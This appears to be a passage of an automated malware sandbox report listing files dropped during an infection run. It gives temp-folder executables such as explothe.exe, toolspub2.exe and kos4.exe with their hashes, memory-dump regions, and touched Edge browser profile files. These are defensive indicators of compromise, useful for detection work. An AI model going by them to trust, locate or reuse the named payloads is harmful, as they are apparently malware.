SHA256 37bef7fe1c718f9ee1ffa18fe8fb3a516d1f464aaa536f02c18f1b63b58edd73
SHA512 b8fa039c87837355afed88b3b77abfabda3d30a2e887adac620ac204eb6bc30bac809ed6092d837424f3a2c0324641d057c3f90e100634396bb0fa27d4e3f6e0

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe

MD5 f0c7089254a00e815feae5d8181b7f05
SHA1 f3b024cb82395c32629ac49898728fd5010c26cf
SHA256 37bef7fe1c718f9ee1ffa18fe8fb3a516d1f464aaa536f02c18f1b63b58edd73
SHA512 b8fa039c87837355afed88b3b77abfabda3d30a2e887adac620ac204eb6bc30bac809ed6092d837424f3a2c0324641d057c3f90e100634396bb0fa27d4e3f6e0

C:\Users\Admin\AppData\Local\Temp\A345.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\A345.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe

MD5 b4050b917e28921affbf2dffa8246e5c
SHA1 44d3497d429695898e5230916d0ef0924d97c660
SHA256 8a14bc158f2bab49eafd556bd51635a7102b322a4debb1f63fcb57dcb7f745f1
SHA512 3680bf7579f36bcf440c349ea41f872bc36ca45297d1c384120844e86a3d8bf7e9c1af615dac4f6e93c5f32bcf3adfe95dbffaea802a2bcd2504395aa8abfa83

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe

MD5 b4050b917e28921affbf2dffa8246e5c
SHA1 44d3497d429695898e5230916d0ef0924d97c660
SHA256 8a14bc158f2bab49eafd556bd51635a7102b322a4debb1f63fcb57dcb7f745f1
SHA512 3680bf7579f36bcf440c349ea41f872bc36ca45297d1c384120844e86a3d8bf7e9c1af615dac4f6e93c5f32bcf3adfe95dbffaea802a2bcd2504395aa8abfa83

C:\Users\Admin\AppData\Local\Temp\A4DC.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe

MD5 4d6df12a24cadf74e6bf1190c60fdda2
SHA1 7eaadf868c91ab8138f20f300b3b1258c83608fe
SHA256 03dd8bac72407083fc3d0017dcb1f7733700c553eaf4676f4505b20fb1d34d99
SHA512 3421f21c5a3cb33a08a716de494a2cb58443b6a99cd47e13be3666a0ec671f48e50c032f0c8b96dbaa47bd77031b69c69ef29fb830b995f272f92eac1e8411a1

memory/3900-70-0x0000000072FB0000-0x0000000073760000-memory.dmp

memory/980-71-0x0000000000540000-0x000000000054A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe

MD5 7251c994d90ff3fd8068854ccd67a748
SHA1 3e536fbb4b8d12e90eb0a67a7f728ee1479d0f19
SHA256 cd17f994e3027975bda505f96d1b218bbbd059c472495be222437a7aae651292
SHA512 87239c495e10298df1427c2dbaf1c8f93705f89e9bb95dfdd45554fe7cecee7e1bed80586369893262fd26f4d740fdb3de99cf7c3601375d68143765d26d841a

memory/980-75-0x0000000072FB0000-0x0000000073760000-memory.dmp

memory/3900-76-0x00000000005B0000-0x00000000005EE000-memory.dmp

memory/3900-84-0x00000000079B0000-0x0000000007F54000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/3900-88-0x00000000074A0000-0x0000000007532000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A4DC.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe

MD5 7251c994d90ff3fd8068854ccd67a748
SHA1 3e536fbb4b8d12e90eb0a67a7f728ee1479d0f19
SHA256 cd17f994e3027975bda505f96d1b218bbbd059c472495be222437a7aae651292
SHA512 87239c495e10298df1427c2dbaf1c8f93705f89e9bb95dfdd45554fe7cecee7e1bed80586369893262fd26f4d740fdb3de99cf7c3601375d68143765d26d841a

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe

MD5 4d6df12a24cadf74e6bf1190c60fdda2
SHA1 7eaadf868c91ab8138f20f300b3b1258c83608fe
SHA256 03dd8bac72407083fc3d0017dcb1f7733700c553eaf4676f4505b20fb1d34d99
SHA512 3421f21c5a3cb33a08a716de494a2cb58443b6a99cd47e13be3666a0ec671f48e50c032f0c8b96dbaa47bd77031b69c69ef29fb830b995f272f92eac1e8411a1

memory/4372-89-0x0000000000400000-0x000000000047E000-memory.dmp

memory/4372-90-0x00000000006B0000-0x000000000070A000-memory.dmp

memory/3900-91-0x0000000007690000-0x00000000076A0000-memory.dmp

memory/3900-95-0x0000000007490000-0x000000000749A000-memory.dmp

memory/4372-98-0x0000000072FB0000-0x0000000073760000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A4DC.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

C:\Users\Admin\AppData\Local\Temp\A4DC.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

memory/3900-99-0x0000000008580000-0x0000000008B98000-memory.dmp

memory/3900-101-0x0000000007700000-0x0000000007712000-memory.dmp

memory/3900-100-0x00000000077D0000-0x00000000078DA000-memory.dmp

memory/3900-103-0x0000000007760000-0x000000000779C000-memory.dmp

memory/3900-104-0x00000000078E0000-0x000000000792C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Temp\C4E8.exe

MD5 dd879217d6270ce10527c1f4752e2602
SHA1 9b95b9be2b977cf9b7f5b268e33b2a8abc438e3d
SHA256 a406a3c1474a57c62f3dbd56aa15d5d732e6a0fe8bbfd7bce9425b132204da8b
SHA512 897e72e251fdab2b4a1a2a0f33df3e5e3ab931620614527bf483b196505f87ebdddd884881aa21fbc661b72ca5157cb60e3b6d21ca04c526c099b5439e75648d

C:\Users\Admin\AppData\Local\Temp\C4E8.exe

MD5 dd879217d6270ce10527c1f4752e2602
SHA1 9b95b9be2b977cf9b7f5b268e33b2a8abc438e3d
SHA256 a406a3c1474a57c62f3dbd56aa15d5d732e6a0fe8bbfd7bce9425b132204da8b
SHA512 897e72e251fdab2b4a1a2a0f33df3e5e3ab931620614527bf483b196505f87ebdddd884881aa21fbc661b72ca5157cb60e3b6d21ca04c526c099b5439e75648d

memory/3076-114-0x0000000072FB0000-0x0000000073760000-memory.dmp

memory/3076-117-0x0000000000AF0000-0x00000000014D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C7D7.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\C7D7.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

memory/4372-124-0x0000000000400000-0x000000000047E000-memory.dmp

memory/4372-125-0x0000000072FB0000-0x0000000073760000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CDE3.exe

MD5 ec332d52fa353ecf367019c9ae7ca1b1
SHA1 c32b2a20209248fd70511095ab34208ad31411a5
SHA256 703a29e3d93624bc00dbd3507f0614f3ab23e294c5da1174264b36e9d2ec7926
SHA512 035fb0c75d1e261c65d43028aca76f23d7975da4b3ff7a7c7330bdcdc549a9bdce6bf078c1c4e6db22055a7295c723d1b8a9e7bb958d549f015f703d929e6fee

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 4d1f0d9bfac03f5237d800cd61ed1133
SHA1 a8d2884e093ac24d23d48c804f617a0115fe697c
SHA256 2b6d2a194d0b61942c703bf307cf879f26e2dc4ab67cd77d5827e7422b287a18
SHA512 acc3da350a0b372b06cd996e35357239b3c2cf3b3cacf41b76b322c378f934217db67ec0a7efdc472b717dffb0014606fea765c4a79f0a60fc0966ec542824a9

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 4d1f0d9bfac03f5237d800cd61ed1133
SHA1 a8d2884e093ac24d23d48c804f617a0115fe697c
SHA256 2b6d2a194d0b61942c703bf307cf879f26e2dc4ab67cd77d5827e7422b287a18
SHA512 acc3da350a0b372b06cd996e35357239b3c2cf3b3cacf41b76b322c378f934217db67ec0a7efdc472b717dffb0014606fea765c4a79f0a60fc0966ec542824a9

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 4d1f0d9bfac03f5237d800cd61ed1133
SHA1 a8d2884e093ac24d23d48c804f617a0115fe697c
SHA256 2b6d2a194d0b61942c703bf307cf879f26e2dc4ab67cd77d5827e7422b287a18
SHA512 acc3da350a0b372b06cd996e35357239b3c2cf3b3cacf41b76b322c378f934217db67ec0a7efdc472b717dffb0014606fea765c4a79f0a60fc0966ec542824a9

memory/3900-149-0x0000000072FB0000-0x0000000073760000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f4787679d96bf7263d9a34ce31dea7e4
SHA1 ebbade52b0a07d888ae0221ad89081902e6e7f1b
SHA256 bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87
SHA512 de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

memory/980-154-0x0000000072FB0000-0x0000000073760000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CDE3.exe

MD5 ec332d52fa353ecf367019c9ae7ca1b1
SHA1 c32b2a20209248fd70511095ab34208ad31411a5
SHA256 703a29e3d93624bc00dbd3507f0614f3ab23e294c5da1174264b36e9d2ec7926
SHA512 035fb0c75d1e261c65d43028aca76f23d7975da4b3ff7a7c7330bdcdc549a9bdce6bf078c1c4e6db22055a7295c723d1b8a9e7bb958d549f015f703d929e6fee

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 5283cdd674c839582d319aabafaad58e
SHA1 04f113b8d35ed25942fcf11e830c3161004f5c18
SHA256 46e15742c0c686e214623ca91a21ca993f9cce2c2c548b6ddb417662248ff9e2
SHA512 f3488dd33861a33f6d82f5ae575a5e07e9397cf8dcc17470b7e08f5d8da254980b35b34978cd2366de70964f184a43e7ac2bcb1c437b08495b15a8ff3c4e205d

memory/980-169-0x0000000072FB0000-0x0000000073760000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/4696-182-0x00000000007D0000-0x00000000007D8000-memory.dmp

memory/1900-184-0x0000000000550000-0x00000000005AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c147570bb7bd251cd5450651967370ed
SHA1 2419e17c08a89dd79f8047a2943e207abd0f1e8f
SHA256 30db1c698f7f53df3ba07d71a09e63cca89ba75adb41da0ed7b8ecb08f96085e
SHA512 b8d5513440f5b4add18c46937afe821a525ae955ee90e2ed9558626f48eda2bcdb005ec5e15e0775a80723f98525c9d3f2c80e3611970cb30fb8e926c267ba13

memory/1900-207-0x0000000000400000-0x000000000047E000-memory.dmp

memory/1900-211-0x0000000072FB0000-0x0000000073760000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CDE3.exe

MD5 ec332d52fa353ecf367019c9ae7ca1b1
SHA1 c32b2a20209248fd70511095ab34208ad31411a5
SHA256 703a29e3d93624bc00dbd3507f0614f3ab23e294c5da1174264b36e9d2ec7926
SHA512 035fb0c75d1e261c65d43028aca76f23d7975da4b3ff7a7c7330bdcdc549a9bdce6bf078c1c4e6db22055a7295c723d1b8a9e7bb958d549f015f703d929e6fee

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/4696-214-0x0000000002740000-0x0000000002750000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CDE3.exe

MD5 ec332d52fa353ecf367019c9ae7ca1b1
SHA1 c32b2a20209248fd70511095ab34208ad31411a5
SHA256 703a29e3d93624bc00dbd3507f0614f3ab23e294c5da1174264b36e9d2ec7926
SHA512 035fb0c75d1e261c65d43028aca76f23d7975da4b3ff7a7c7330bdcdc549a9bdce6bf078c1c4e6db22055a7295c723d1b8a9e7bb958d549f015f703d929e6fee

memory/3076-215-0x0000000072FB0000-0x0000000073760000-memory.dmp

memory/4696-191-0x00007FF9C6A50000-0x00007FF9C7511000-memory.dmp

memory/3900-216-0x0000000007690000-0x00000000076A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 5283cdd674c839582d319aabafaad58e
SHA1 04f113b8d35ed25942fcf11e830c3161004f5c18
SHA256 46e15742c0c686e214623ca91a21ca993f9cce2c2c548b6ddb417662248ff9e2
SHA512 f3488dd33861a33f6d82f5ae575a5e07e9397cf8dcc17470b7e08f5d8da254980b35b34978cd2366de70964f184a43e7ac2bcb1c437b08495b15a8ff3c4e205d

\??\pipe\LOCAL\crashpad_3628_RKEHHLEYBEAYXZDG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 5283cdd674c839582d319aabafaad58e
SHA1 04f113b8d35ed25942fcf11e830c3161004f5c18
SHA256 46e15742c0c686e214623ca91a21ca993f9cce2c2c548b6ddb417662248ff9e2
SHA512 f3488dd33861a33f6d82f5ae575a5e07e9397cf8dcc17470b7e08f5d8da254980b35b34978cd2366de70964f184a43e7ac2bcb1c437b08495b15a8ff3c4e205d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 36d9cc1d352a3ab0b7d54c86e9723767
SHA1 86e9d4da198a2c42628e11dabcdd3032d18ccd21
SHA256 1d95f3319102ddc7fbb59af8be9367d77fe4b79b374d14c5d843c6a3f75ee119
SHA512 381f93f00f70147fe52b2556f65123771cac274a7a512072f67c7a8829430bdce8bf7cefbfea0cfbdc96501d6b4f409fccf9bf4a13c6738da56aa1c002d0881f

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 55447f754ed036c9ea0019c5b58206bd
SHA1 e5066619176a8cbb6743d87cee2a2fb9a2926dd6
SHA256 4a14afe4a03293e8abb10967647f48b6b3b00fdc6f966715f338269945da95e6
SHA512 2d2a8a01cc6dd0efcfc3a6672f284665d933607c2f8bbdd85a96417e0088675142823c441c0c85735a8a8d517fdd9433061173a5b4a22d70273821fbf6821ccc

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 55447f754ed036c9ea0019c5b58206bd
SHA1 e5066619176a8cbb6743d87cee2a2fb9a2926dd6
SHA256 4a14afe4a03293e8abb10967647f48b6b3b00fdc6f966715f338269945da95e6
SHA512 2d2a8a01cc6dd0efcfc3a6672f284665d933607c2f8bbdd85a96417e0088675142823c441c0c85735a8a8d517fdd9433061173a5b4a22d70273821fbf6821ccc

C:\Users\Admin\AppData\Local\Temp\FEE7.exe

MD5 e2ff8a34d2fcc417c41c822e4f3ea271
SHA1 926eaf9dd645e164e9f06ddcba567568b3b8bb1b
SHA256 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0
SHA512 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2

C:\Users\Admin\AppData\Local\Temp\FEE7.exe

MD5 e2ff8a34d2fcc417c41c822e4f3ea271
SHA1 926eaf9dd645e164e9f06ddcba567568b3b8bb1b
SHA256 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0
SHA512 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 031c15ffd895d182be9975ef5d6f2e6b
SHA1 a23a5a08f02722d7701bb85fc6bc4f6b2a648263
SHA256 41e9498c737c28e07bb7fc3023af1a31e19a605f44a6ecd29dbbaecb8eea8110
SHA512 112efc87edcf0cc9f59301d7f888dce52c4944419d670ac160e9ef7045d5d2bdfe58dea331ad2c2b4d6bca15bd8cb3a71e830577be0fc28817c8473ac20ae6d6

memory/1900-276-0x0000000072FB0000-0x0000000073760000-memory.dmp

memory/4784-282-0x00000000001D0000-0x00000000005B0000-memory.dmp

memory/4696-280-0x00007FF9C6A50000-0x00007FF9C7511000-memory.dmp

memory/3956-283-0x00007FF71A0A0000-0x00007FF71A641000-memory.dmp

memory/4388-285-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 3a748249c8b0e04e77ad0d6723e564ff
SHA1 5c4cc0e5453c13ffc91f259ccb36acfb3d3fa729
SHA256 f98f5543c33c0b85b191bb85718ee7845982275130da1f09e904d220f1c6ceed
SHA512 53254db3efd9c075e4f24a915e0963563ce4df26d4771925199a605cd111ae5025a65f778b4d4ed8a9b3e83b558066cd314f37b84115d4d24c58207760174af2

C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp

MD5 e416b5593ef10377e8edc748ca6f2527
SHA1 d06fb79becff1bedd80f1b861449c8665af9aa67
SHA256 a7e400b62721851753ec6453e7eb3a5df4797149cfa1d3b0bf9db0a837863eb0
SHA512 8e44b491f86779ab5a6834da0639952be11d6ab598f392cee28ed5dabd71b3b15330d872620c1d0d858024e0e09d81ab0f9addbde82c1695de22d0bdf8f5be7c

memory/4268-297-0x0000000000400000-0x0000000000434000-memory.dmp

memory/4268-298-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3076-305-0x0000000000640000-0x0000000000641000-memory.dmp

memory/4268-318-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe

MD5 f9b01336b5bc1df7afbd26b4df09d8e9
SHA1 b4d987a003e90420853d1c6a232e9dd0ba6f06ae
SHA256 7495e5e90c41793f72907b0e1355d97a867a0874b95c81804bd3f461a77e5996
SHA512 77618a417fd858f1b195e0761f1fe3346569c0c7499879654c3333723dd9887a3242ccce36e8a751f051d7fdec6bfc4ad60e5610354bd7bf1dd1d038bdff36c3

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe

MD5 f9b01336b5bc1df7afbd26b4df09d8e9
SHA1 b4d987a003e90420853d1c6a232e9dd0ba6f06ae
SHA256 7495e5e90c41793f72907b0e1355d97a867a0874b95c81804bd3f461a77e5996
SHA512 77618a417fd858f1b195e0761f1fe3346569c0c7499879654c3333723dd9887a3242ccce36e8a751f051d7fdec6bfc4ad60e5610354bd7bf1dd1d038bdff36c3

C:\Users\Admin\AppData\Local\Temp\is-BP7RS.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/1900-321-0x0000000072FB0000-0x0000000073760000-memory.dmp

memory/1900-322-0x0000000000F90000-0x0000000000FCE000-memory.dmp

memory/1360-325-0x0000000002280000-0x0000000002289000-memory.dmp

memory/1360-324-0x0000000000890000-0x0000000000990000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 4d1f0d9bfac03f5237d800cd61ed1133
SHA1 a8d2884e093ac24d23d48c804f617a0115fe697c
SHA256 2b6d2a194d0b61942c703bf307cf879f26e2dc4ab67cd77d5827e7422b287a18
SHA512 acc3da350a0b372b06cd996e35357239b3c2cf3b3cacf41b76b322c378f934217db67ec0a7efdc472b717dffb0014606fea765c4a79f0a60fc0966ec542824a9

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

MD5 46e6bb577ceb65806ef24e900abf04a0
SHA1 947f8ac53bbc779a51a48f5e7d9634720105b689
SHA256 b9763b0e13159d7ddedcd2ae757e9557a6f1d8081b2646ae4d9bebe845f9c451
SHA512 be03e8f7f4e2759022e0bbbf02c93fe4343f2f603c83b8e46e8387371de6a0d38221ea37b480f3e2135af3077e96f8c515b04d99aa4cd215e8db32c467513e4b

memory/1912-368-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5288-382-0x0000000000400000-0x0000000000636000-memory.dmp

memory/5288-385-0x0000000000400000-0x0000000000636000-memory.dmp

memory/4388-386-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 72d1dadb8838b0a9e31b268b19869bab
SHA1 31f3cbaf16146a19898c19380b588356f605e00e
SHA256 311770a1f545d55c42589c057eb76a3be79d98fb9d61edc527373cb76ff048ff
SHA512 e0e12a4eafb47d46eb247425c55a2e0f722ee3b3e5f5a2c671bd86b6efc697627c59e88b53d44a22079192b18d3a5de9f5d4603f3778252b6013bafce19bb856

memory/4784-384-0x0000000072FB0000-0x0000000073760000-memory.dmp

memory/5288-381-0x0000000000400000-0x0000000000636000-memory.dmp

memory/752-398-0x0000000002970000-0x0000000002D6D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

memory/752-400-0x0000000002D70000-0x000000000365B000-memory.dmp

memory/1900-351-0x0000000007FA0000-0x0000000007FB0000-memory.dmp

memory/1912-348-0x0000000000400000-0x0000000000409000-memory.dmp

memory/752-402-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5584-405-0x0000000000400000-0x0000000000636000-memory.dmp

memory/1912-406-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3284-404-0x0000000002E80000-0x0000000002E96000-memory.dmp

memory/3076-403-0x0000000000640000-0x0000000000641000-memory.dmp

